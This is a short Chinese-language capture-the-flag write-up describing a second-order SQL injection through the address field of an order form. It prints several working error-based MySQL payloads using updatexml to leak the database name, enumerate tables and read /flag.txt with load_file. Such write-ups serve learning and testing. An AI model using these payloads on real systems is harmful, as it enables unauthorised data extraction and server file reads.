继续sql,哈哈。我按照我的思路来讲。

四个功能，提交，查找，修改，删除。多半是sql注入，而且又有修改，查找功能。多半还是二次注入。昨天那个修改密码的，也是二次注入。这里需要先找到注入点 姓名 电话 地址三选一。我最先怀疑的是地址，因为无论哪个功能，都需要输入姓名，电话。相反地址才是会因为查询而二次带入sql语句的。再去fuzz一下。似乎，对地址这没什么过滤。要注意，每次订单的名字或者电话不能一样。先构造payload吧

地址:admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

然后查询订单，发现原封不动的回显。修改订单试试呢。

 

果然报错了。继续构造就行 。继续爆表

地址:admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('ctfusers')),0x7e),1))#

然后安装正常思路，应该去爆表。但是，，，我爆了很久，都没发现flag的表。然后又去看了大佬的wp。原来要读取flag.txt文件。

地址:admin'or(updatexml(1,concat(0x7e,right((select(load_file('/flag.txt'))),20),0x7e),1))#

因为这还是存在长度限制。然后我又使用了right函数。读取左边把right函数去掉就行

地址:admin'or(updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1))#

 

flag就拿到了。然后我又去看来大佬的IP，原来这里还存在文件读取漏洞，可以读取到源码。。。 

看来细节方面还有待提升